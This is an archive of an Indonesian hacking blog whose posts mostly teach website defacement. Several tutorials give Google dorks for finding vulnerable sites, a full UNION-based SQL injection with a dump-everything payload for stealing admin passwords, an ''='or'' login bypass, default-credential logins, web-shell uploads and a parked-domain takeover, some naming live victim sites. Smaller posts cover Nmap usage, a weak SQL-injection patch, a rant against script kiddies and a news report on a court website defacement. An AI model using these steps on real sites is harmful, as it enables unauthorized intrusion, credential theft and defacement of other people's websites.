Archive for December 2019



SQL INJECTION

Assalamu'alaikum
Ok kali ini saya akan share tutorial cara deface POC SQLi
Dikarenakan ada yang nanya "Bang share deface ini lah itulah alah mem*k :v"
Nah kali ini w akan share Tutorialnya
Ok Langsung saja pertama-tama kalian dorking dulu di google menggunakan Dork dibawah:
inurl:/home.php?page= site:com
inurl:/media.php?id=
inurl:/guru.php?id= site:sch.id
inurl:/events.php?id=
inurl:/play.php?id=
inurl:/detail.php?id=
Kembangkan dengan otak vokep atau waifu klean:v
Jika sudah kmudian kalian pilih salah satu target pilihan klean. jika sudah sekarang kalian harus memeriksa VULN atau tidak webtarget klean dengan menambahkan kutip dibellakang string target klean CONTOH:
http://webtarget.com/index.php?id=32
menjadi:
http://webtarget.com/index.php?id=32'
Jika muncul tulisan sql syntax error atau Mysql error berarti webtarget klean VULN
Jikaa tidak muncul cari web lain
Ok jika klean sudah menemukanya selanjutnya klean Tinggal melakukan sepperti dibawah ikuti saja
http://webtarget.com/index.php?id=32'+order+by+1--+
dan ganti angka 1 sampai strusnya smpai muncul tulisan error Column
atau kosong dari sebuah halaman tersbut
http://webtarget.com/index.php?id=32'+order+by+2--+[No error]
http://webtarget.com/index.php?id=32'+order+by+3--+[No error]
http://webtarget.com/index.php?id=32'+order+by+4--+[No error]
http://webtarget.com/index.php?id=32'+order+by+5--+[ ERROR ]
Nah kali ini saya mendapatkan pesan errornya di column 5
Berarti jumlah colum dalam web tersebut ada 4
OK SEKARANG waktunya kita akan mengubah ORDER sama BY menjadi UNION SELECT,, CONTOH:
http://webtarget.com/index.php?id=-32'+UNION+SELECT+1,2,3,4--+
Jika sudah maka akan muncul sebuah angka nah saya nemu angka 2 tinggal saya inject di column ke 2 dengan
dios dibawah kalian salin
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,
table_name,column_name)),@)

Dan angka 2 saya timpah dengan dios saya, Menjadi
http://webtarget.com/index.php?id=-32'+UNION+SELECT+1,
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,table_
name,column_name)),@),3,4--+

Nah maka berhasil kita inject Web tersebut waktunya kita Dump dengan cara kalian pilih salah satu yang akan kalian buka misalkan kalian ingin mengetahui username ama pasword web tersebut,, karna tujuan kalian ingin mendeface^_^,, webnyamaka kalian cari table yang
berhubung menuju ke admin,, misalkan saya disini, columnya adallah admin dan Tablenya adalah [USERNAME_DAN PASWORD]
Maka kalian tinggal rubah dios yang tadi menjadi
make_set(6,@:=0x0a,(select(1)from(admin)where@:=
make_set(511,@,0x3c6c693e,
USER_NAME,PASWORD)),@)
DAN Selesai kalian sudah mendapatkan username dan pasword web tersebut Nah biasanya username ama paswordnya masih dalam bentuk md5.
Seperti angka acak gitulah
Atau biasanya ada yang langsung jadi, dan jika paswordnya bentuknya MD5 maka kalian hanya Tinggal HASH md5 tersebut DISINI
atau kalian juga bisa cari di google HASH Kiler di mbah gugel:v
Ok jika sudah kalian hash md5 tersebut dan menjadi username ama pasword yang benar seperti
user: admin23
pasword: kattie28
Maka langkah selanjutnya kalian hanya harus menemukan ADLOGNYA atau admin login sama saja ya, misalkan
http://webtarget.com/admin
seperti diatas jika masih tidak ketemu kalian ganti menjadi
http://webtarget.com/webadmin
sampai ketemu jika tidak kalian bisa cari menggunakan admin finder, kalian bisa mendowload nya di playstore oke?
Dan jika sudah ketemu kalian tinggal masukan username sama ppasword web tersebut dan LOGIN
Dan jika kalian berhasil masuk sekarang kalian hanya perlu mencari tempat uploadnya, cari sampai berhasil lo sudah menjadi admin gimanasi gblk:v
Dan jika menemukanya kalian hanya upload file shell kalian Lalu panggil dan ganti halaman depanya DONE:v
Mungkin cukup sekian tutorial dari saya kali ini jika ada salah kata mohon dimaafkan
Terimakasih.

CONTACT ME ON INSTAGRAM : TOUCH ME SENPAI >_<






































Tutorial SQLi Manual


Hallo Guys, Kali ini Autor akan membahas tentan scaner yang ada pada OS Kali Linux ( NMAP).

Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan.





Cara Install Nmap
1. Install Winpcap versi 2.1 atau versi yang lebih baru, yaitu WinPcap_3_0.exe
2. Reboot
3. Download aplikasi Nmap terbaru dari www.nmap.org,
4. Unzip file tersebut menggunakan Winzip atau utility dekompresi lainnya.

Cara Menggunakan Nmap
Berikut beberapa contoh teknik yang dapat digunakan menggunakan nmap.

1. Memeriksa port yang terbuka
nmap<host/IP target>

2. Memeriksa spesifik port pada mesin target
nmap -p <host/IP target>

3. Memeriksa service yang berjalan pada port
nmap – sV <host/IP target>

4. Memeriksa port mesin target dalam 1 segmen jaringan
nmap <host/IP target>

5. Mengidentifikasi sistem operasi mesin
    nmap -O <host/IP target>

Contoh setelah kita melakukan nmap adalah sebagai berikut:

root@bt:~# nmap -p 1-65535 -sV -O 172.16.200.20
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-14 14:07 WIT
Nmap scan report for 172.16.200.20
Host is up (0.00052s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds?
1025/tcp  open  msrpc         Microsoft Windows RPC
1026/tcp  open  msrpc         Microsoft Windows RPC
1029/tcp  open  msrpc         Microsoft Windows RPC
1031/tcp  open  msrpc         Microsoft Windows RPC
1032/tcp  open  msrpc         Microsoft Windows RPC
1033/tcp  open  msrpc         Microsoft Windows RPC
1091/tcp  open  ff-sm?
2869/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp  open  ms-term-serv?
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
64141/tcp open  tcpwrapped
MAC Address: 70:71:BC:EC:EC:51 (Pegatron)
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS details: Microsoft Windows Vista SP0 - SP2, Windows Server 2008, or Windows 7 Ultimate
Network Distance: 1 hop
Service Info: OS: Windows
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.29 seconds
root@bt:~#


Sekian pembahasan tentang Nmap, Semoga Bermanfaat, Jangan Lupa di Share yaa

Author : ./Hades

BACA JUGA ARTIKEL TENTANG NMAP : TOUCH ME SENPAI >_<

CONTACT ME ON INSTAGRAM : TOUCH ME SENPAI :*

Fungsi Nmap Dan Cara Menggunakannya



Assalamualaikum Wr.Wb
    Ok Gan Kembali Lagi Dengan Gua ./Hades Kali Ini Gua Bakalan Share Tutorial Cara Membuat Anak:v Eh Maksud Gua Cara Patch Bypas Admin:v

       bypass admin adalah suatu kesalahan program pada sistem / system  apa itu bypass admin? bypass admin adalah suatu methode yang digunakan oleh peretas peretas dari dunia ini bypass admin ini digunakan para peretas untuk menginjek ehhh mksdnya menginject halaman admin pada sebuah website dengan sebuah exploit tertentu contoh exploit untuk bypass admin '=' 'or' nah sebagai exploit tertentu mereka bisa saja login ke admin web sebagai pemilik website pada website tertentu



oke langsung ke tutorialnya saja silahkan lihat script pada berikut ini


 <?php
 $message = “”;
if(isset($_POST[‘submit’])){
 $username= ($_POST[username]);
 $password = md5($_POST[‘password’]);
 $query = “SELECT * FROM admin WHERE username = ‘$username’ and password = ‘$password’ and usertype = ‘1’”;
 $query_result = mysqli_query($con, $query);
if(mysqli_num_rows($query_result)){
 $row = mysqli_fetch_assoc($query_result);
 $_SESSION[‘admin_id’] = $row[‘id’];
 $_SESSION[‘username’] = $row[‘username’];
 header(“location: index.php”);
 }else{
 $message = “Username and password is not matched.”;
 }
 }
 ?>
perhatikan pada bagian ini
 $username= ($_POST[username]);
Pada script di atas tidak terdapat filterisasi karakter yang mengakibatkan sebuah bug, sehingga hekel bisa mengexploit dengan memasukkan query inject sehingga mereka dapat login sebagai admin. Tapi jangan khawati karena saya akan memberikan solusinya.

3. Nah, untuk cara patchnya simpel kok, sekarang kita akan memfilter karakter  pada array nya tinggal ubah seperti script di bawah ini



 $username= addslashes($_POST[username]);


$username = htmlspecialchars(addslashes($_POST['username']),ENT_QUOTES);
$password = htmlspecialchars(addslashes($_POST['password'])),ENT_QUOTES;


fungsi addslashes adalah untuk merubah/menambahkan sebuah backslash(\) saat ada seseorang memasukkan sebuah string/karakter(').

fungsi htmlspecialchars adalah agar jika ada seseorang yang memasukkan sebuah script html, maka script tersebut tidak akan berjalan(Dikembalikan dengan karakter yang dimasukkan), berbeda lagi jika kalian tidak memakai fungsi htmlspecialchars, maka script HTML yang di masukkan oleh seorang hacker akan berjalan(Dikembalikan dengan karakter yang dimasukkan, tapi sudah dalam bentuk tampilan)



Nah, sekarang website kalian sudah terdapat filterisasi karakter jadi hekel tidak akan bisa menginject query website kalian.

Nah mungkin cukup sekian artikel saya mengenai "  Cara Patch Bypass Admin

CONTACT ME ON INSTAGRAM : TOUCH ME SENPAI>_<

Cara Patch Bypass Admin Agar Tidak Terbypass


Gw sering mau ketawa tapi juga merasa sedih, kesian dan juga marah kalau liat ada postingan tentang ajakan DDOS sebuah situs. Ketawa karena mereka berusaha men DDOS situs yang dilindungi Cloudflare (atau cloud firewall lain). Ibaratnya mau menyerang klub malam maksiat tapi yang diserang malah papan iklan klub malam tersebut di pinggir jalan :D


Diposting ajakan mereka biasanya juga diberikan daftar tool yang bisa dipakai. Yang gw lihat ada batch file yg sekedar melakukan ping, dan ada salah satu tool DDOS android bahkan mengirimkan IMEI dan device id ke Server yang diserang, jadi memudahkan untuk dilacak balik . Sebagai catatan "kiddie" disini bukan menunjukkan umur, tapi skill yang seperti anak".

Sebagai catatan ada banyak teknik DDOS yang menarik dan ada yang spesifik satu OS/SERVER/Aplikasi tertentu. Di tulisan DDOS generil dengan ping (ICMP) , UDP,  dam request flooding. Kesel juga karna ini yang membuat internet diindonesia ini menjadi melambat -_




DDOS juga merupakan serangan yang pathetic, andai kata berhasil, meskipun tanpa perlindungan apapun DDOS itu sifatnya cuma sementara, ketika traffic DDOS berhenti maka situsnya kembali normal. Yang bikin gw ngakak lagi kalau merasa berhasil men DDOS sebuah situs karena sudah tidak bisa diakses dari komputernya, padahal hanya blok IP nya penyerang yang diblokir firewall sementara orang lain masih bisa mengakses situs tersebut tanpa masalah apapun :v

Harapan gw sii semoga setelah kalian belajar programming kalian menemukan bahwa ternyata anda punya bakat. Jika memang bisa ahli dalam melakukan programming, ada banyak kesempatan dalam maupun luar negeri dengan gaji yang besar dan uang ini legal. Dan kemungkinan lain, kalian akan jadi hacker beneran dan membuat tool sendiri bukan sekedar memakai tool buatan orang lain. Harapan gw jg kalian bisa melakukan hacking yang advanced, bukan hanya bengong membaca paper atau presentasi dari konferensi security ๐Ÿ˜‚

Selamat belajar dan semoga bisa mengupgrade diri dari script kiddie menjadi lebih baik ๐Ÿ˜

Stop Menjadi Script Kidie

hades-tech.blogspot.com - Situs resmi Pengadilan Negeri Jakarta Pusat diduga diretas oleh pendukung Luthfi Alfiandi, terdakwa kasus kericuhan aksi pelajar saat September lalu.

Berdasarkan pantauan Kamis pagi (19/12/2019), situs resmi http: //pn-jakartapusat.go.id tersebut diketahui diretas pada pukul 09.30 WIB dengan gambar ilustrasi Luthfi Alfiandi menggunakan celana anak SMA dan jaket abu sembari memegang bendera.

"Woopz, (diikuti link berita), tertangkap berorasi dihukum penjara, korupsi berjuta masih berkuasa," kata sang peretas website resmi pengadilan khusus kelas IA itu.


Terkait ini, Humas Pengadilan Negeri Jakarta Pusat Makmur mengatakan akan melakukan pengecekan.

"Iya sementara dicek," kata Makmur saat dikonfirmasi.

Hingga pukul 10.03 WIB tampilan situs resmi PN Jakarta Pusat itu masih sama pada saat diketahui sudah diretas.

Dalam konteks ini, terdakwa Luthfi Alfiandi ditangkap polisi pada saat mengikuti aksi pelajar di depan DPR RI. Ia menjalani sidang di PN Jakpus.

Ada tiga dakwaan alternatif yang dibacakan Jaksa Penuntut Umum kepada Luthfi. Dakwaan pertama adalah pasal 212 jo 214 ayat (1) KUHP, lalu dakwaan kedua pasal 170 ayat (1) KUHP, dan ketiga pasal 218 KUHP.


Baca juga artikel terkait SITUS PENGADILAN NEGERI JAKARTA PUSAT DIRETAS

Situs Resmi Pengadilan Negeri Jakarta Pusat Diretas



Bypass Admin Up Shell

Deface poc Bypass Admin + Up Shell

hello assalamualaikum Wr.Wb
kembali lagi dengan saya ./Hades
Ok! gausah basa basi,  langsung aja ke tutorialnya...

Dork : 
Inurl: login[4"admin"] site: 
Inurl: admin ["Userlogin"]**site: 
inurl: /admin.php intext:login intext:adminsitrator 
inurl: /admin/index.php intext:username 
inurl :/admin/Admin.php intext:login 
inurl: /administrator/login.php intext:username site:. 
inurl: /admin/login.php

kali ini saya sudah ada live target  website Di bawah ini


1. isi username & password dengan '="or" kayak gambar di bawah ini



2. ketika sudah berada di dashboard administratornya, lalu pilih properti tambah baru


3. lalu pilih shell backdoor anda yang ingin anda upload, kalau anda belum ada shellnya silahkan            download di google banyak kok, santuy aja ','


4.  ok! kalau sudah lalu klik upload


5.  nah kalau sukses tampilannya akan seperti dibawah ini 


6. lalu kalian tekan lama gambar rusak tersebut dan pilih buka ditab baru, 
    kalau sudah kalian akses shell anda tersebut


7.lalu kalian pilih script deface anda yang ingin anda upload, lalu klik upload


8. nah cara aksesnya script yang baru anda upload tadi gini

http://www.cw-casaibiza.es/upload/namasc.html

Masih belum paham? Contact me on instagram : https://www.instagram.com/williamgans1312

ok sekian tutorial dari saya kali ini
wassalamualaikum Wr.Wb

Deface Poc Bypass Admin



Assalamualaikum wr.wb

Eee yo ajg :v perkenal kan nama w Hades, w orang paling tampan ea :v Oke ajg gausa basa basi, kali ini w mau kasih tutorial ngehek :v

Bahan bahan : - Device
                          - Rokok (Kalo ngudud ea :v)
                          - Teh, Susu, Kopi :v
                          - Dork

Dork : - inurl:/smss
           - intittle:AMSS++
Sisa nya kembangin pake otak bokep atau waifu klean ya ajg:v

Pertama lu dorking dulu ya bangsat.

Di sini w pakai live target kalo udah dapat site nya, pilih salah satu nama kalian klik aja nama nya

Nanti tampilan nya akan langsung mengarah ke admin login nya, nah di sini lah vuln nya masukan username sama password nya : 

Username : admin
Password : 1234

Gabisa? Cari target lain!
Kalo masuk lanjut kita ngehek:v

Nah ini adalah tampilan dashboard admin nya, langsung pergi ke "SMS for Desktop"
"Bang ko bahasa nya bahasa Thailand?" ya translate goblok:v jaman udah canggih jangan di buat susah karna ke goblokan lu doang:v
Oke lanjut:v


Cari manager personalia, atau apa kek manager gitu lah ajg trus cari "Informasi guru dan staf"

Trus cari "Guru dan personel saat ini" done? Langkah terakhir adalah upload shell
Nah di sini kan yang paling klean suka?:v eits tapi jangan senang dulu bro:v poc ini tidak semua index web nya bisa tertebas:v tapi jangan nangid ea, klean bisa titip file eks : .html atau .php ko

Nahh kalian kalo udah masuk ke informasi guru langsung edit di pojok kanan gambar yg di bawah๐Ÿ‘‡ nanti lu bisa upload shell lu di situ. Nah selesai upload shell nanti akan ada gambar orang dempet itu:v nah itulah shell kalian:v 


Yg saya lingkari itu nanti akan muncul seperti kaya gambar gitu tapi rusak, nah itulah shell kalian. Di zoom dlu slurr biar kliatan, terus gambar rusak nya itu kalian tekan lama, nanti ada bacaan open. Dan jeng jeng:V serah lo mao apain tuh web:v inget ya ucapan w, poc ini ga semua web bisa di tebas index nya tapi kadang juga ada dir hijau slur:v 

Oke mungkin cukup sampe sini tutor dari w, kurang lebih nya mohon maaf, kalo ada yang mau tanya bisa langsung ke instagram w kalo mau lebih jelas : 
INSTAGRAM W ๐Ÿ‘‡
    DM ae.
    Sampe ketemu lagi sama w di blog selanjutnya, ikuti terus blog nya slurr:v

Deface Poc Backdoor Account Vulnerability


Haii, Kembali Lagi Dengan Gua ./Hades Gans , Kali Ini Gua Bakal Kasih Tau Cara Deface Poc Parked Domain , Oke Gausah Banyak Bacot Langsung Ke Tutornya Ea

Bahan Bahan Yang Dibutuhkan :
- 000webhost
- HackerTarget.com(buat reverse ip)
- Sc Deface/Shell
- Hp/Laptop
- Face Gans Wajib :v


Step 1 :
   

Kalian Daftar/Login Di 000webhost , Berhubung Gua Udh Ada , Jadi Gua Gausah Daftar Ea


Step 2 :


Jika Sudah, Nanti Kalian Disuruh Buat Web Contohnya : "namaweb.000webhost.com" nah kalian isi sesuka kalian aja :"

Lalu Selesai, Kalian Akan Muncul Tampilan Seperti Ini :


Kalau Tampilan Sudah Seperti Itu, Tinggal Kalian , Klik Web Yang Habis Kalian Bikin >_<

Step 3 :

Jika Sudah Maka Akan Muncul Tampilan Seperti Ini :


Kalau Sudah, Kalian Klick/Pencet Bacaan "Tools" yang Ada Di Sebelah Kiri
Kalau Sudah Di Klick , Maka Tampilan nya Akan Seperti Ini :


Kalian Klick Lagi Tulisan "File Manager" Yang ada Di sebelah Kiri, Lalu Kalian Klick "Upload Files"

Jika Sudah , Kalian Tinggal Upload Sc Deface Kalian Atau Shell
Upload nya Dimana? Use Your Brain :)

 Note : Jika Kalian Ingin Tebas Index, Kasih Namanya : Index.php
            Jika Kalian Ingin Upsell , Kasih Namanya : Namashellkamu.php

Step 4 :

Kalian Balik Ke Sini Lagi :


Lalu Klik Bacaan "Set Web Addres" , Jika Sudah Maka Akan Muncul Tampilan Seperti Ini :


Kalau Sudah Seperti Ini , Kalian Pergi Ke Web HackerTarget.com, Link Ada Diatas
Jika Sudah Masukan Ip , Web000host Kalian , Jika Kalian Malas, Pakai Ip Web000host Gua
Ip : 145.14.145.112

Kalian Salin Aja Ke Hackertarget.com nya, Jika Sudah Klick Yang Dibawah Sini :


Kamu Klick, Kalau Sudah , Muncul Banyak Web , Kalian Search Web Nya Satu Satu, Kalau Error Berarti Itu VULN, Gua Udh Nemu Web Nya :)

Jadi Langsung Aja Kita Balik Ke 000webhost nya lagi
Kalian Kembali Lagi Ke Sini :


Kalian Klick "Add Domain" , Jika Sudah, Maka Tampilannya Akan Seperti Ini :


Jika Sudah Kalian Pilih Yang Paling Atas , Lalu Kalian Klick Next :)
Jika Sudah, Kalian Masukan Web Yang Eror/Vuln Yang Habis Kalian Cari :)

Note : Isi Web Nya Jangan Pakai Http sama /

Contoh : gptmoney.tk

Jika Kalian Sudah Isi, Lalu Kalian Klick Saja "Park Domain"

Jika Berhasil Tampilan Akan Seperti Ini :


Nanti Ada Bacaan "ready" Disamping Nama Web Yang Vuln Tadi, Lalu Kalian Klick Manage Disamping Kanan Itu, Nanti Ada Pilihan 4 macam yaitu :
- Link Website
- Set MX Recode
- Manage Email Forwardes
- Manage DNS Zone

Kalian Pilih Saja Yag "Link Website" Jika Sudah Pilih Nama web00host kalian, Jika Sudah Klick "Continue" , Lalu Kalian Klick Lagi "Connect" , Nah Jika Sudah Maka Akan Muncul Tampilan Seperti Ini :


Jika Sudah Kalian Klick Aja Nama Web Yang Vuln Tadi, Dan Boom Web Berhasil Tertebas :v
Jika Kalian Nitip Shell, Kalian Tingall Cari aja seperti Ini :

- namaweb/namashell.php

Oke Ini Hasil Parked Domain Gua :v

http://gptmoney.tk/

KALO MASIH BINGUNG? CONTACT ME ๐Ÿ‘‰https://www.instagram.com/williamgans1312
Oke Segini Dulu Tutorial Nya , Sayonaraaa >_<

Deface Poc Parked Domain

- Copyright © Hades Zone - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -